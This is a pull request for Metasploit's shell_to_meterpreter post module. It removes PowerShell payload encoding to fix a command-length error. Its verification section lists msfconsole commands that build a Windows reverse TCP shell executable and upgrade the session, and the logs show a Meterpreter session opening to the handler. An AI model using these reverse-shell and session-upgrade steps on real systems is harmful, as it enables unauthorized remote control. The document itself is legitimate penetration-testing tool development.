### PR TITLE
fix #15528, fix powershell command length in shell_to_meterpreter

### DIFF
--- a/modules/post/multi/manage/shell_to_meterpreter.rb
+++ b/modules/post/multi/manage/shell_to_meterpreter.rb
@@ -163,7 +163,7 @@ class MetasploitModule < Msf::Post
       else
         if (have_powershell?) && (datastore['WIN_TRANSFER'] != 'VBS')
           vprint_status("Transfer method: Powershell")
-          psh_opts = { :encode_final_payload => true, :persist => false, :prepend_sleep => 1 }
+          psh_opts = { :persist => false, :prepend_sleep => 1 }
           unless session.type == 'shell'
             psh_opts[:remove_comspec] = true
           end


### PR DESCRIPTION
This is a quick fix for https://github.com/rapid7/metasploit-framework/issues/15528, which removes the `powershell -e` encoding, in order to reduce the command length.
Alternatively we could consider removing the AMSI bypass here.

## Verification

Acquire a windows shell:
```
use payload/windows/x64/shell/reverse_tcp
set LHOST x.x.x.x
set LPORT 4444
generate -o reverse_shell.exe -f exe
to_handler
```

Attempt to upgrade it:
```
sessions -u -1
```

## Before
```
msf6 payload(windows/x64/shell/reverse_tcp) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.13.37:4433
[-] Post failed: Rex::RuntimeError Powershell command length is greater than the command line maximum (8192 characters)
[-] Call stack:
[-]   /.rbenv/versions/2.7.2/lib/ruby/gems/2.7.0/gems/rex-powershell-0.1.92/lib/rex/powershell/command.rb:408:in `cmd_psh_payload'
[-]   /metasploit-framework/lib/msf/core/exploit/powershell.rb:242:in `cmd_psh_payload'
[-]   /metasploit-framework/modules/post/multi/manage/shell_to_meterpreter.rb:170:in `run'
```

## After
```
msf6 payload(windows/x64/shell/reverse_tcp) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.13.37:4433
msf6 payload(windows/x64/shell/reverse_tcp) >
[*] Sending stage (175174 bytes) to 192.168.13.105
[*] Meterpreter session 2 opened (192.168.13.37:4433 -> 192.168.13.105:49748) at 2021-08-10 12:14:27 +0100
[*] Stopping exploit/multi/handler
```